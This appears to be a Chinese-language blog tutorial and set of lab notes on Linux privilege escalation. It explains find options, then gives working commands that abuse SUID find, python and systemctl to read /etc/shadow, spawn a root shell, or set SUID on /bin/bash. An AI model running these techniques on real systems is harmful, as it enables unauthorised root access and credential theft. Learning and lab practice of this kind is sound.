find提权

更新中。。。。。。。。。。。。。。

find 常用参数

语法：find [path…] [expression]

path为查找路径，.为当前路径，/为根目录

expression即为参数

-name： 按文件名查找文件

-perm： 按照文件权限来查找文件，4000，2000,1000为分别表示SUID,SGID,SBIT，如777为普通文件的最高权限，7000为特殊文件的最高权限

-user： 按照文件属主来查找

-size n： 文件大小是n个单位

-type：
    d：目录
    f：文件
    c：字符设备文件
    b：块设备文件
-atime n： time表示日期，时间单位是day,查找系统最后n*24小时内曾被存取过的文件或目录

-amin n： 查找系统最后n分钟内曾被存取过的文件或目录

-ctime n: 查找系统中最后n*24小时内曾被改变文件状态(权限、所属组、位置…)的文件或目录

-cmin n: 查找系统中最后N分钟内曾被改变文件状态(权限、所属组、位置…)的文件或目录

-mtime: 查找系统中最后N分钟内曾被更改过的文件或目录

-mmin n: 查找系统中最后n*24小时内曾被更改过的文件或目录

-print： 将匹配的文件输出到标准输出

-exec： find命令对匹配的文件执行该参数所给出的shell命令。相应命令的形式为’command’ { } ;，注意{ }和\；之间的空格。

提权

方法一、

# 1. 查看find命令位置
which find

# 2. 查看find命令权限
ls -l /usr/bin/find     # find的默认位置

-rwsr-xr-x. 1 root root 

# 有s 表示可以提权

方法二、

# 用find 命令查找 有超级权限属性的文件

find / -perm -u=s -type f 2>/dev/null

# 假如find命令可提权 有s权限位
# 查看是否可以用root 命令执行命令

find `which find` -exec whoami \;
# 命令解释： 以find 命令 执行  whoami 命令。
# find  (一个路径或文件必须存在)  -exec  执行命令 （结束）\

可以直接执行命令
find /usr/bin/find -exec cat /etc/shadow \;
查看普通用户没有权限查看的文件。

find / -perm -4000 -type f 2>/dev/null
或
find / -perm -u=s -type f 2>/dev/null

-perm：按照文件权限来查找文件，4000，2000，1000为分别表示SUID,SGID,SBIT，如777为普通文件的最高权限，7000为特殊文件的最高权限
-type：d（目录）f（文件）c（字符设备文件）b（块设备文件）

记录

#######################################
find / -type f -user root -perm -u=s 2>/dev/null
出现了一个很奇怪的/usr/bin/python
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
提权成功
########################################
find / -perm -4000 -user root -type f 2>/dev/null

找到
/bin/systemctl
目标在/root/root.txt
转到/bin目录下，

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF

粘贴到命令提示符中

cat /tmp/output即可
或
TF2=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF2
/bin/systemctl link $TF2
/bin/systemctl enable --now $TF2
/bin/bash -p
此时拿到root权限